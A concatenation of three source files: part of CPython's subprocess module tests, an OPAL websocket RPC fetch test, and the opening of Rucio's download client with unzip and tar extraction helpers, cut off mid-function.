# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
support.gc_collect() # For PyPy or other GCs.
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a typeerror would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test reads the exit status,
# so Popen failed to read it and uses a default returncode instead.
self.assertIsNotNone(proc.returncode)
def test_send_signal_race2(self):
# bpo-40550: the process might exist between the returncode check and
# the kill operation
p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])
# wait for process to exit
while not p.returncode:
p.poll()
with mock.patch.object(p, 'poll', new=lambda: None):
p.returncode = None
p.send_signal(signal.SIGTERM)
p.kill()
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with warnings_helper.check_warnings((".*overriding close_fds",
RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
rpc_fetch_test.py | import os
import sys
# Add parent path to use local src as package for tests
root_dir = os.path.abspath(
os.path.join(
os.path.dirname(__file__), os.path.pardir, os.path.pardir, os.path.pardir
)
)
sys.path.append(root_dir)
import asyncio
from multiprocessing import Process
import pytest
import uvicorn
from fastapi import FastAPI
from fastapi_websocket_rpc import RpcMethodsBase, WebsocketRPCEndpoint
from opal_common.fetcher import FetchingEngine
from opal_common.fetcher.providers.fastapi_rpc_fetch_provider import (
FastApiRpcFetchConfig,
FastApiRpcFetchEvent,
FastApiRpcFetchProvider,
)
# Configurable
PORT = int(os.environ.get("PORT") or "9110")
uri = f"ws://localhost:{PORT}/rpc"
DATA_PREFIX = "I AM DATA - HEAR ME ROAR"
SUFFIX = " - Magic!"
class RpcData(RpcMethodsBase):
async def get_data(self, suffix: str) -> str:
return DATA_PREFIX + suffix
def setup_server():
app = FastAPI()
endpoint = WebsocketRPCEndpoint(RpcData())
endpoint.register_route(app, "/rpc")
uvicorn.run(app, port=PORT)
@pytest.fixture(scope="module")
def server():
# Run the server as a separate process
proc = Process(target=setup_server, args=(), daemon=True)
proc.start()
yield proc
proc.kill() # Cleanup after test
@pytest.mark.asyncio
async def test_simple_rpc_fetch(server):
""""""
got_data_event = asyncio.Event()
async with FetchingEngine() as engine:
engine.register.register_fetcher(
FastApiRpcFetchProvider.__name__, FastApiRpcFetchProvider
)
# Event for RPC fetch
fetch_event = FastApiRpcFetchEvent(
url=uri,
config=FastApiRpcFetchConfig(
rpc_method_name="get_data", rpc_arguments={"suffix": SUFFIX}
),
)
# Callback for event
async def callback(result):
data = result.result
assert data == DATA_PREFIX + SUFFIX
got_data_event.set()
await engine.queue_fetch_event(fetch_event, callback)
await asyncio.wait_for(got_data_event.wait(), 5)
assert got_data_event.is_set()
|
downloadclient.py | # Copyright 2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Tomas Javurek <tomasjavurek09@gmail.com>, 2018
# - Vincent Garonne <vgaronne@gmail.com>, 2018
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018
# - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019
# - Tobias Wegner <tobias.wegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
#
# PY3K COMPATIBLE
from __future__ import division
import copy
import logging
import os
import os.path
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, ServiceUnavailable,
NotAllFilesDownloaded, RSENotFound, RucioException, SourceNotFound)
from rucio.common.utils import adler32, md5, detect_client_location, generate_uuid, parse_replicas_from_string, send_trace, sizefmt, execute, parse_replicas_from_file
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
def __init__(self, program_name, useability_check_args, extract_args, logger):
"""
Initialises a extraction tool object
:param program_name: the name of the archive extraction program, e.g., unzip
:param useability_check_args: the arguments of the extraction program to test if its installed, e.g., --version
:param extract_args: the arguments that will be passed to the program for extraction
:param logger: logging.Logger object
"""
self.program_name = program_name
self.useability_check_args = useability_check_args
self.extract_args = extract_args
self.logger = logger
self.is_useable_result = None
def is_useable(self):
"""
Checks if the extraction tool is installed and usable
:returns: True if it is usable otherwise False
"""
if self.is_useable_result is not None:
return self.is_useable_result
self.is_usable_result = False
cmd = '%s %s' % (self.program_name, self.useability_check_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
self.is_usable_result = (exitcode == 0)
except Exception as error:
self.logger.debug('Failed to execute: "%s"' % exitcode)
self.logger.debug(error)
return self.is_usable_result
def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
"""
Calls the extraction program to extract a file from an archive
:param archive_file_path: path to the archive
:param file_to_extract: file name to extract from the archive
:param dest_dir_path: destination directory where the extracted file will be stored
:returns: True on success otherwise False
"""
if not self.is_useable():
return False
args_map = {'archive_file_path': archive_file_path,
'file_to_extract': file_to_extract,
'dest_dir_path': dest_dir_path}
extract_args = self.extract_args % args_map
cmd = '%s %s' % (self.program_name, extract_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
return (exitcode == 0)
except Exception as error:
self.logger.debug('Failed to execute: "%s"' % exitcode)
self.logger.debug(error)
return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False):
"""
Initialises the basic settings for an DownloadClient object
:param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
:param logger: Optional: logging.Logger object to use for downloads. If None nothing will be logged.
"""
if not logger:
logger = logging.getLogger('%s.null' % __name__)
logger.disabled = True
self.logger = logger
self.tracing = tracing
if not self.tracing:
logger.debug('Tracing is turned off.')
self.is_human_readable = True
self.client = client if client else Client()
self.client_location = detect_client_location()
self.is_tape_excluded = True
self.is_admin = False
if check_admin:
account_attributes = list(self.client.list_account_attributes(self.client.account))
for attr in account_attributes[0]:
if attr['key'] == 'admin':
self.is_admin = attr['value'] is True
break
if self.is_admin:
self.is_tape_excluded = False
logger.debug('Admin mode enabled')
self.trace_tpl = {}
self.trace_tpl['hostname'] = self.client_location['fqdn']
self.trace_tpl['localSite'] = self.client_location['site']
self.trace_tpl['account'] = self.client.account
self.trace_tpl['eventType'] = 'download'
self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]
self.use_cea_threshold = 10
self.extraction_tools = []
# unzip <archive_file_path> <did_name> -d <dest_dir_path>
extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger))
# tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger))
def download_file_from_archive(self, items, trace_custom_fields={}):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
did - DID string of the archive file (e.g. 'scope:file.name'). Wildcards are not allowed
archive - DID string of the archive from which the file should be extracted
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises SourceNotFound: if xrdcp was unable to find the PFN
:raises ServiceUnavailable: if xrdcp failed
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace = copy.deepcopy(self.trace_tpl)
trace['uuid'] = generate_uuid()
log_prefix = 'Extracting files: '
logger.info('Processing %d item(s) for input' % len(items))
for item in items:
archive = item.get('archive')
file_extract = item.get('did')
rse_name = item.get('rse')
if not archive or not file_extract:
raise InputValidationError('File DID and archive DID are mandatory')
if '*' in archive:
logger.debug(archive)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
file_extract_scope, file_extract_name = self._split_did_str(file_extract)
archive_scope, archive_name = self._split_did_str(archive)
# listing all available replicas of given archhive file
rse_expression = 'istape=False' if not rse_name else '(%s)&istape=False' % rse_name
archive_replicas = self.client.list_replicas([{'scope': archive_scope, 'name': archive_name}],
schemes=['root'],
rse_expression=rse_expression,
unavailable=False,
client_location=self.client_location)
# preparing trace
trace['scope'] = archive_scope
